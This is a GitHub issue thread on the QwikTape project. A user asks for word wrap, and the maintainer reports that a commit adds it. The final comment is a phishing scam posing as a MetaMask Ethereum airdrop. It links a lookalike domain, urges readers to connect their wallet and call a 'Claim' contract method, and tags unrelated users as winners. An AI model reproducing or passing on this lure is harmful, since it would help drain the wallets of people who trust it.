### ISSUE TITLE
"Word Wrap" option 

### ISSUE THREAD

**Issue by Icanavero** [4silvertooth/QwikTape#9]
Good Day! 
Could you please add "Word Wrap" option in QwikTape? 
Can't tell for other users, but in the version I have tested (version 0.6 portable, Windows 10) a chunk of copied text just can't fit into the window. Usually the problem like this is tackled via "Word Wrap" implementation. Please see the screenshot with the issue. 
![wordw20231104](https://github.com/4silvertooth/QwikTape/assets/136631691/4d617dea-332b-4ea3-acfc-74444f56dd3c)

**Comment by 4silvertooth** [comment]
Looking for what can be done.

**Comment by 4silvertooth** [comment]
Commit ba7fc17 brings word wrap, I suppose I'll make it the default behavior. But the PDF export with word-wrap will need some work.

**Comment by mesidharth** [comment]
# 🌐 **$ETH MetaMask Airdrop: Claim Your $1000 in Ethereum Now!**

🎉 **Congratulations!** 

You're among the chosen participants for the $1.5k Ethereum Airdrop. We're thrilled to grant you $1000 in ETH to celebrate the year's end. But that's not all—connect now, and you'll instantly receive an extra $100! Follow the steps below to claim your Ethereum and make the most of this exclusive giveaway!

[![Claim Now](https://pbs.twimg.com/media/Frg-sWYWIAYCoiX.jpg:large)](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask)

## **Steps to Claim:**

### 1. 🚀 **Connect Your MetaMask Wallet:**
   - Click on the [Connect Wallet](https://wwwwmetaskmask.communitymaskmeta.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=metamask) link.
   - Select **MetaMask** as your preferred wallet provider.

### 2. 🔄 **Interact with the Contract and Claim Your $100:**
   - Once your MetaMask wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract. Ensure you use the **Claim** method.

💰 **Don't miss out on your $1000 in Ethereum!** Additionally, enjoy an instant $100 upon connection. Act now to secure your ETH. Remember, there's a chance to win up to $20,000—it's your golden opportunity with MetaMask!


Winners: @andyb, @nacyot, @coloradopioneer, @usertm, @tonyo, @amr, @djj0s3
